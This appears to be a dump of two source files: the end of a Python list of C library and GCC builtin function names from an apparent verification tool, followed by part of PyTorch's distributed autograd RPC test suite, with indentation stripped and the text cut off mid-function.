'roundf',
'roundl',
'round',
'scalblnf',
'scalblnl',
'scalbln',
'scalbnf',
'scalbnl',
'scalbn',
'snprintf',
'tgammaf',
'tgammal',
'tgamma',
'truncf',
'truncl',
'trunc',
'vfscanf',
'vscanf',
'vsnprintf',
'acosf',
'acosl',
'asinf',
'asinl',
'atan2f',
'atan2l',
'atanf',
'atanl',
'ceilf',
'ceill',
'cosf',
'coshf',
'coshl',
'cosl',
'expf',
'expl',
'fabsf',
'fabsl',
'floorf',
'floorl',
'fmodf',
'fmodl',
'frexpf',
'frexpl',
'ldexpf',
'ldexpl',
'log10f',
'log10l',
'logf',
'logl',
'modfl',
'modf',
'powf',
'powl',
'sinf',
'sinhf',
'sinhl',
'sinl',
'sqrtf',
'sqrtl',
'tanf',
'tanhf',
'tanhl',
'tanl',
# Outside c99 and c89
'_exit',
'alloca',
'bcmp',
'bzero',
'dcgettext',
'dgettext',
'dremf',
'dreml',
'drem',
'exp10f',
'exp10l',
'exp10',
'ffsll',
'ffs',
'fprintf_unlocked',
'fputs_unlocked',
'gammaf',
'gammal',
'gamma',
'gammaf_r',
'gammal_r',
'gamma_r',
'gettext',
'index',
'isascii',
'j0f',
'j0l',
'j0',
'j1f',
'j1l',
'j1',
'jnf',
'jnl',
'jn',
'lgammaf_r',
'lgammal_r',
'lgamma_r',
'mempcpy',
'pow10f',
'pow10l',
'pow10',
'printf_unlocked',
'rindex',
'scalbf',
'scalbl',
'scalb',
'signbit',
'signbitf',
'signbitl',
'signbitd32',
'signbitd64',
'signbitd128',
'significandf',
'significandl',
'significand',
'sincosf',
'sincosl',
'sincos',
'stpcpy',
'stpncpy',
'strcasecmp',
'strdup',
'strfmon',
'strncasecmp',
'strndup',
'toascii',
'y0f',
'y0l',
'y0',
'y1f',
'y1l',
'y1',
'ynf',
'ynl',
'yn',
'abort',
'abs',
'acos',
'asin',
'atan2',
'atan',
'calloc',
'ceil',
'cosh',
'cos',
'exit',
'exp',
'fabs',
'floor',
'fmod',
'fprintf',
'fputs',
'frexp',
'fscanf',
'labs',
'ldexp',
'log10',
'log',
'malloc',
'memcmp',
'memcpy',
'memset',
'modf',
'modff',
'modfl',
'pow',
'printf',
'putchar',
'puts',
'scanf',
'sinh',
'sin',
'snprintf',
'sprintf',
'sqrt',
'sscanf',
'strcat',
'strchr',
'strcmp',
'strcpy',
'strcspn',
'strlen',
'strncat',
'strncmp',
'strncpy',
'strpbrk',
'strrchr',
'strspn',
'strstr',
'tanh',
'tan',
'vfprintf',
'vprintf',
'vsprintf'
]
IMPLICIT_FUNCTIONS = [
'__VERIFIER_assume',
# stdio.h
'fclose',
'clearerr',
'feof',
'ferror',
'fflush',
'fgetpos',
'fopen',
'fread',
'freopen',
'fseek',
'fsetpos',
'ftell',
'fwrite',
'remove',
'rename',
'rewind',
'setbuf',
'setvbuf',
'tmpfile',
'tmpnam',
'fprintf',
'printf',
'sprintf',
'vfprintf',
'vprintf',
'vsprintf',
'fscanf',
'scanf',
'sscanf',
'fgetc',
'fgets',
'fputc',
'fputs',
'getc',
'getchar',
'gets',
'putc',
'putchar',
'puts',
'ungetc',
'perror',
# stdlib.h
'atoi',
'atof',
'atol',
'atoll',
'strtod',
'strtol',
'strtoll',
'strtoq',
'strtold',
'strtof',
'strtoul',
'strtoull',
'calloc',
'free',
'malloc',
'realloc',
'alloca',
'valloc',
'abort',
'atexit',
'exit',
'getenv',
'system',
'bsearch',
'qsort',
'abs',
'div',
'labs',
'ldiv',
'mblen',
'mbstowcs',
'mbtowc',
'wcstombs',
'wctomb',
# string.h
'memchr',
'memcmp',
'memcpy',
'memmove',
'memset',
'strcat',
'strncat',
'strchr',
'strcmp',
'strncmp',
'strcoll',
'strcpy',
'strncpy',
'strcspn',
'strerror',
'strlen',
'strpbrk',
'strrchr',
'strspn',
'strstr',
'strtok',
'strxfrm',
# fenv.h
'feclearexcpt',
'feraiseexcept',
'fegetexceptflag',
'fesetexceptflag',
'fegetround',
'fesetround',
'fegetenv',
'fesetenv',
'feholdexcept',
'feupdateenv',
'fetestexcept',
'__underflow',
'__uflow',
'__overflow',
'_IO_getc',
'_IO_putc',
'_IO_feof',
'_IO_ferror',
'_IO_peekc_locked',
'_IO_flockfile',
'_IO_funlockfile',
'_IO_ftrylockfile',
'_IO_vfscanf',
'_IO_fprintf',
'_IO_padn',
'_IO_seekoff',
'_IO_seekpos',
'_IO_free_backup_area'
] + GCC_BUILTINS + ['__' + g for g in GCC_BUILTINS
] + ["__builtin__" + g for g in GCC_BUILTINS]
|
dist_autograd_test.py | import sys
import threading
import time
from enum import Enum
import random
import torch
import torch.nn as nn
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
x = grads[rref.local_value()]
if x.is_sparse:
assert grad.is_sparse
x = x.to_dense()
grad = grad.to_dense()
else:
assert not grad.is_sparse
return torch.equal(x, grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
def build_sparse_tensor(coalesce=False, requires_grad=True, dtype=torch.float32, device=None):
i = [[0, 1, 1], [2, 0, 2]]
v = [3.2, 4.1, 5.3]
tensor = torch.sparse_coo_tensor(i, v, (3, 3), requires_grad=requires_grad, dtype=dtype, device=device)
if coalesce:
tensor = tensor.coalesce()
return tensor
def build_sparse_one_gradient(dtype=torch.float32):
i = [[0, 1, 1], [2, 0, 2]]
v = [1, 1, 1]
tensor = torch.sparse_coo_tensor(i, v, (3, 3), dtype=dtype)
return tensor
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
def my_sum(t):
return torch.sparse.sum(t) if t.is_sparse else t.sum()
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.any
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dis atugorad context, run rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
loss = my_sum(ret)
dist_autograd.backward(context_id, [loss])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
loss = my_sum(ret)
dist_autograd.backward(context_id, [loss])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
# Common utils for both CPU and CUDA test suites
class CommonDistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
class DistAutogradTest(CommonDistAutogradTest):
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
# Retrieve the next functions in the graph.
next_funcs = send_function.next_functions
self.assertEqual(2, len(next_funcs))
# We should now hit t1 and t2 in the autograd graph.
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[0][0].name())
self.assertEqual(t1, next_funcs[0][0].variable)
self.assertEqual(0, next_funcs[0][1])
self.assertEqual("torch::autograd::AccumulateGrad", next_funcs[1][0].name())
self.assertEqual(t2, next_funcs[1][0].variable)
self.assertEqual(0, next_funcs[1][1])
# Test recv functions.
self.assertEqual(ret.grad_fn, recv_function)
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, executes torch.add(t1, t2) and sends
# result tensor t3 back.
# For this context in this rank, it expects graph like this:
# send and recv functions:
# rpcSendBackward
# |
# t3.AddBackward0
# / \
# t1.recvRpcBackward t2.recvRpcBackward
def _verify_graph_for_rpc_call_exec(self, send_function):
# Verify next function is AddBackward0
next_funcs = send_function.next_functions
self.assertEqual(1, len(next_funcs))
add_backward_fn = next_funcs[0][0]
self.assertEqual("AddBackward0", add_backward_fn.name())
# Verify the next two functions are the same recv backward function.
next_funcs = add_backward_fn.next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For a context passed from previous nested chain calls, this rank
# receives two tensors t1 and t2, forwards t1 and t2 tensors using
# nested rpc call to next dst. In return route, receive result tensor t3
# from next dst and forwarding t3 back to previous calls.
# For this context in this rank, it expects graph like this:
# send and recv functions for receiving and forwarding t1 and t2:
# rpcSendBackward
# / \
# t1.recvRpcBackward t2.recvRpcBackward
# send and recv functions for receiving and forwarding t3:
# rpcSendBackward
# |
# t3.recvRpcBackward
def _verify_graph_for_nested_rpc_call(self, ctx):
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
# For send function when making nest rpc call,
# next functions of the send function are two recv functions
# for received two tensors from previous call
next_funcs = list(send_functions.values())[0].next_functions
self.assertEqual(2, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[1][0].name()
)
self.assertEqual(next_funcs[0][0], next_funcs[1][0])
# For send function when returning resonpose to previous call
# next function of the send function is the recv function
# for received tensor result returned from nested call
next_funcs = list(send_functions.values())[1].next_functions
self.assertEqual(1, len(next_funcs))
self.assertEqual(
"torch::distributed::autograd::RecvRpcBackward", next_funcs[0][0].name()
)
def _test_graph(self, fn, exec_mode, sparse):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
if sparse:
t1 = build_sparse_tensor()
t2 = build_sparse_tensor()
else:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), fn, args=(t1, t2))
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), fn, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Verify graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# Verify graph for previous context id.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
# autograd context should be cleaned up by now.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._retrieve_context(context_id)
# No autograd context available.
with self.assertRaises(RuntimeError):
ctx = dist_autograd._current_context()
@dist_init
def test_graph_for_builtin_call(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC, False)
@dist_init
def test_graph_for_builtin_call_sparse(self):
self._test_graph(torch.add, ExecMode.RPC_SYNC, True)
@dist_init
def test_graph_for_python_call(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC, False)
@dist_init
def test_graph_for_python_call_sparse(self):
self._test_graph(my_py_add, ExecMode.RPC_SYNC, True)
@dist_init
def test_graph_for_builtin_remote_call(self):
self._test_graph(torch.add, ExecMode.REMOTE, False)
@dist_init
def test_graph_for_builtin_remote_call_sparse(self):
self._test_graph(torch.add, ExecMode.REMOTE, True)
@dist_init
def test_graph_for_python_remote_call(self):
self._test_graph(my_py_add, ExecMode.REMOTE, False)
@dist_init
def test_graph_for_python_remote_call_sparse(self):
self._test_graph(my_py_add, ExecMode.REMOTE, True)
# 3-layer nested calls
def _test_graph_for_py_nested_call(self, exec_mode, sparse):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
if sparse:
t1 = build_sparse_tensor(requires_grad=True)
t2 = build_sparse_tensor(requires_grad=True)
else:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
nest_dst_rank = (dst_rank + 1) % self.world_size
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(t1, t2, dst_rank, self.world_size, 1),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
# Barrier to ensure all RPCs are done.
dist.barrier()
for rd in [1, 2, 3]:
rpc.rpc_sync(
worker_name((self.rank + rd) % self.world_size),
_set_rpc_done,
args=(context_id, rd),
)
# Barrier to ensure all set_rpc_done have completed.
dist.barrier()
# For self.rank, it has 4 graphs to verify
# One is for current context id when this rank send first rpc call.
# Second one is for prev context id when this rank make 1st nested
# call.
# Third one is for prev prev context id when this rank make
# 2nd nested call.
# Last one is for prev prev prev context id when this rank
# execute the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC, False)
@dist_init
def test_graph_for_py_nested_call_sparse(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC, True)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE, False)
@dist_init
def test_graph_for_py_nested_remote_call_sparse(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE, True)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode, sparse):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
if sparse:
t1 = build_sparse_tensor(requires_grad=True)
t2 = build_sparse_tensor(requires_grad=True)
else:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
# One is for current context id when this rank send first rpc
# call and execute the torch.add() operator.
# Another one is for prev context id when this rank make
# nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC, False)
@dist_init
def test_graph_for_py_nested_call_itself_sparse(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC, True)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE, False)
@dist_init
def test_graph_for_py_nested_remote_call_itself_sparse(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE, True)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode, sparse):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if sparse:
t1 = build_sparse_tensor(requires_grad=False)
t2 = build_sparse_tensor(requires_grad=False)
else:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# the callee, as the caller does not know whether the return
# value would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC, False)
@dist_init
def test_no_graph_with_tensors_not_require_grad_sparse(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC, True)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE, False)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote_sparse(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE, True)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode, sparse):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
if sparse:
tensor = build_sparse_tensor(requires_grad=(i % 2 == 0))
else:
tensor = torch.ones(3, 3, requires_grad=(i % 2 == 0))
tensors.append(tensor)
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify appropriate tensors have been attached the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
self.assertEqual(tensors[i], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC, False)
@dist_init
def test_rpc_complex_args_sparse(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC, True)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE, False)
@dist_init
def test_remote_complex_args_sparse(self):
self._test_rpc_complex_args(ExecMode.REMOTE, True)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still cleanup the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_with_grad_sparse(self):
t1 = build_sparse_tensor(requires_grad=True)
t2 = build_sparse_tensor(requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
